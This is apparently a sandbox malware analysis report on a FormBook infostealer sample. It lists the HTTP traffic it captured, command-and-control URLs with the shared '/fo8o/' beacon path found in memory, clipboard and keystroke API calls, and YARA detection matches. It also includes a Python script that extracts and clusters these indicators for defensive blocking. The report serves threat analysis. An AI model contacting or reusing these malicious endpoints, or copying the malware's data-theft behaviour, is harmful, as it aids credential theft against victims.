content="width=device-width,initial-scale=1"><title>www.b301.space</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*]]>*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text">Домен зарегист
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Sun, 09 Jun 2024 16:03:21 GMT | Content-Type: text/html | Content-Length: 548 | Connection: close | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sun, 09 Jun 2024 16:03:28 GMT | Server: Apache | Content-Length: 196 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: netbtugc.exe, 00000004.00000002.3855652610.00000000059A0000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3857668891.0000000006920000.00000004.00000800.00020000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.00000000049C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://push.zhanzhang.baidu.com/push.js
            Source: hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3854245040.0000000002A81000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.b301.space
            Source: hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3854245040.0000000002A81000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.b301.space/fo8o/
            Source: netbtugc.exe, 00000004.00000002.3857802306.00000000083EA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netbtugc.exe, 00000004.00000002.3857802306.00000000083EA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: netbtugc.exe, 00000004.00000002.3857802306.00000000083EA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netbtugc.exe, 00000004.00000002.3857802306.00000000083EA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netbtugc.exe, 00000004.00000002.3855652610.0000000004EA2000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000003EC2000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
            Source: netbtugc.exe, 00000004.00000002.3855652610.0000000004EA2000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000003EC2000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
            Source: netbtugc.exe, 00000004.00000002.3855652610.00000000051C6000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.00000000041E6000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://donnavariedades.com/fo8o?Zl4h1=l
            Source: netbtugc.exe, 00000004.00000002.3855652610.0000000005358000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3857668891.0000000006920000.00000004.00000800.00020000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004378000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark
            Source: netbtugc.exe, 00000004.00000002.3857802306.00000000083EA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netbtugc.exe, 00000004.00000002.3857802306.00000000083EA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netbtugc.exe, 00000004.00000002.3857802306.00000000083EA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netbtugc.exe, 00000004.00000002.3855652610.0000000005358000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004378000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
            Source: netbtugc.exe, 00000004.00000002.3855652610.0000000005358000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004378000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
            Source: netbtugc.exe, 00000004.00000002.3855652610.0000000005358000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004378000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
            Source: netbtugc.exe, 00000004.00000002.3855652610.0000000005B32000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004B52000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
            Source: netbtugc.exe, 00000004.00000002.3855652610.0000000005358000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004378000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://hm.baidu.com/hm.js?
            Source: netbtugc.exe, 00000004.00000002.3855652610.0000000005358000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3857668891.0000000006920000.00000004.00000800.00020000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004378000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js
            Source: netbtugc.exe, 00000004.00000002.3855652610.0000000005358000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3857668891.0000000006920000.00000004.00000800.00020000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004378000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css
            Source: netbtugc.exe, 00000004.00000002.3848803016.000000000354B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netbtugc.exe, 00000004.00000003.1732654889.00000000083C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: netbtugc.exe, 00000004.00000002.3848803016.000000000354B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
            Source: netbtugc.exe, 00000004.00000002.3848803016.000000000354B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 00000004.00000002.3848803016.000000000354B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033W
            Source: netbtugc.exe, 00000004.00000002.3848803016.000000000354B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: netbtugc.exe, 00000004.00000002.3848803016.000000000354B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netbtugc.exe, 00000004.00000002.3855652610.000000000485A000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.000000000387A000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://musee.mobi/vivaldi/fo8o/?Zl4h1=PTl5gU/3CD/Xhg5Nd1HWi
            Source: netbtugc.exe, 00000004.00000002.3855652610.000000000485A000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.000000000387A000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://musee.mobi/vivaldi/fo8o/?Zl4h1=PTl5gU/3CD/Xhg5Nd1HWi&#43;eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdH
            Source: netbtugc.exe, 00000004.00000002.3855652610.0000000005B32000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004B52000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.b301.space&rand=
            Source: netbtugc.exe, 00000004.00000002.3855652610.0000000005B32000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004B52000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://reg.ru
            Source: netbtugc.exe, 00000004.00000002.3855652610.0000000005358000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3857668891.0000000006920000.00000004.00000800.00020000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004378000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://track.uc.cn/collect
            Source: netbtugc.exe, 00000004.00000002.3857802306.00000000083EA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
            Source: netbtugc.exe, 00000004.00000002.3855652610.00000000054EA000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.000000000450A000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.empowermedeco.com/fo8o/?Zl4h1=mxnR
            Source: hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.00000000036E8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.goldenjade-travel.com/fo8o/?Zl4h1=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyM
            Source: netbtugc.exe, 00000004.00000002.3855652610.0000000005B32000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004B52000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-3380909-25
            Source: netbtugc.exe, 00000004.00000002.3855652610.0000000004B7E000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3857668891.0000000006920000.00000004.00000800.00020000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000003B9E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
            Source: netbtugc.exe, 00000004.00000002.3855652610.0000000005B32000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004B52000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.b301.space&utm_medium=parking&utm_campaign=s_land_serve
            Source: netbtugc.exe, 00000004.00000002.3855652610.0000000005B32000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004B52000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.b301.space&utm_medium=parking&utm_campaign=s_land_new&
            Source: netbtugc.exe, 00000004.00000002.3855652610.0000000005B32000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004B52000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.b301.space&utm_medium=parking&utm_campaign=s_land_host&am
            Source: netbtugc.exe, 00000004.00000002.3855652610.0000000005B32000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004B52000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.reg.ru/web-sites/?utm_source=www.b301.space&utm_medium=parking&utm_campaign=s_land_cms&a
            Source: netbtugc.exe, 00000004.00000002.3855652610.0000000005B32000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004B52000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.reg.ru/web-sites/website-builder/?utm_source=www.b301.space&utm_medium=parking&utm_campa
            Source: netbtugc.exe, 00000004.00000002.3855652610.0000000005B32000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004B52000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.b301.space&amp;reg_source=parking_auto
            Source: hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000003B9E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.sedo.com/services/parking.php3
            Source: netbtugc.exe, 00000004.00000002.3855652610.00000000059A0000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3857668891.0000000006920000.00000004.00000800.00020000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.00000000049C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00AD425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00AD425A
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00AD4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00AD4458
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00AC0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00AC0219
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00AECDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00AECDAC
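The network and memory-string findings above are more useful once pulled out of the flattened "Source:" rows. The script below is an added example (mine, not Joe Sandbox or FormBook code) that recovers the HTTP response headers from one row, decodes its Data Raw hex into text, and groups the URLs found in memory by their last path segment, so that a path shared across several unrelated hosts (here `/fo8o/`) stands out. The list of header names used to re-split the merged columns is an assumption about this report layout; the sample rows are constructed excerpts of the rows above, with the hex body of the first one cut down to a few tags and ending in a lone nibble like the truncated dump in the report.

```python
"""Pull indicators out of flattened Joe Sandbox 'Source:' rows.

Added example for this report, not Joe Sandbox code. The flattening removed the
column and header separators, so field boundaries are recovered from a list of
known header names (an assumption about this report format).
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed excerpts of rows from the report; the first hex body is shortened
# and ends in a lone nibble to mimic the truncated dump.
SAMPLE_LINES = [
    "Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx"
    "Date: Sun, 09 Jun 2024 16:03:11 GMTContent-Type: text/htmlTransfer-Encoding: chunked"
    "Connection: closeData Raw: 32 39 32 37 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e "
    "3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 "
    "72 65 67 72 75 2d 72 64 61 70 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 62 33 30 31 2e 73 70 "
    "61 63 65 3c 2f 74 69 74 6c 65 3e d",
    "Source: hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3854245040.0000000002A81000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.b301.space/fo8o/",
    "Source: netbtugc.exe, 00000004.00000002.3855652610.00000000051C6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://donnavariedades.com/fo8o?Zl4h1=l",
    "Source: netbtugc.exe, 00000004.00000002.3855652610.000000000485A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://musee.mobi/vivaldi/fo8o/?Zl4h1=PTl5gU/3CD/Xhg5Nd1HWi",
    "Source: netbtugc.exe, 00000004.00000002.3855652610.00000000054EA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.empowermedeco.com/fo8o/?Zl4h1=mxnR",
    "Source: netbtugc.exe, 00000004.00000002.3857802306.00000000083EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=",
    "Source: netbtugc.exe, 00000004.00000002.3855652610.0000000005358000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?",
    "Source: netbtugc.exe, 00000004.00000002.3855652610.0000000005B32000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://reg.ru",
]

# Header names seen in this report; used to re-split the merged fields (assumption).
HEADER_NAMES = ("Server", "Date", "Content-Type", "Content-Length",
                "Transfer-Encoding", "Connection", "Data Raw", "Data Ascii")
FIELD_SPLIT = re.compile(r"(?=(?:%s): )" % "|".join(re.escape(h) for h in HEADER_NAMES))


def parse_http_response(line):
    """Split one flattened 'HTTP traffic detected' row into status, headers and decoded body."""
    rest = line.split("HTTP traffic detected: ", 1)[1]
    fields = FIELD_SPLIT.split(rest)
    result = {"status": fields[0].strip(), "headers": {}, "body": ""}
    for field in fields[1:]:
        name, _, value = field.partition(": ")
        if name == "Data Raw":
            # Keep whole byte tokens only: a truncated dump can end in a lone nibble.
            tokens = [t for t in value.split() if len(t) == 2]
            result["body"] = bytes.fromhex("".join(tokens)).decode("utf-8", errors="replace")
        elif name != "Data Ascii":
            result["headers"][name] = value.strip()
    return result


def looks_parked(body):
    """Registrar parking pages carry <meta name="parking">; a 404 from one is not a live C2 reply."""
    return 'name="parking"' in body


def extract_urls(lines):
    marker = "String found in binary or memory: "
    return [line.split(marker, 1)[1].strip() for line in lines if marker in line]


def beacon_clusters(urls, min_hosts=2):
    """Group URLs by last path segment; one segment on several hosts is a shared beacon path."""
    groups = defaultdict(lambda: {"hosts": set(), "params": set()})
    for url in urls:
        parts = urlsplit(url)
        segments = [s for s in parts.path.split("/") if s]
        if not segments:          # bare hosts carry no path to cluster on
            continue
        group = groups[segments[-1]]
        group["hosts"].add(parts.netloc)
        group["params"].update(parse_qs(parts.query, keep_blank_values=True))
    return {seg: {"hosts": sorted(g["hosts"]), "params": sorted(g["params"])}
            for seg, g in groups.items() if len(g["hosts"]) >= min_hosts}


if __name__ == "__main__":
    resp = parse_http_response(SAMPLE_LINES[0])
    print(resp["status"], resp["headers"].get("Server"),
          "parking page" if looks_parked(resp["body"]) else "not a parking page")
    for seg, info in beacon_clusters(extract_urls(SAMPLE_LINES)).items():
        print(f"/{seg}/ on {len(info['hosts'])} hosts, query keys {info['params']}: {info['hosts']}")
```

Run against the rows above, the decoded body of the first response shows that www.b301.space answered with a reg.ru domain-parking page, so that 404 is not a live server reply, and the only path shared across unrelated hosts is `/fo8o/` with the query key `Zl4h1`. FormBook configurations list many domains that share one beacon path, most of them decoys, so the cluster as a whole is what to block or watch, not any single host.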

            E-Banking Fraud

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000004.00000002.3854247183.0000000003760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1536824368.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3854245040.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.3847634373.0000000003290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1536423830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.3854165692.0000000003720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1537312165.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.3853922844.00000000032F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3854247183.0000000003760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1536824368.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3854245040.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3847634373.0000000003290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1536423830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3854165692.0000000003720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1537312165.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3853922844.00000000032F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: This is a third-party compiled AutoIt script.0_2_00A63B4C
            Source: opp46lGmxd.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
            Source: opp46lGmxd.exe, 00000000.00000000.1376522765.0000000000B15000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_9fd3e593-d
            Source: opp46lGmxd.exe, 00000000.00000000.1376522765.0000000000B15000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_25659a58-f
            Source: opp46lGmxd.exe | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_fe594f84-f
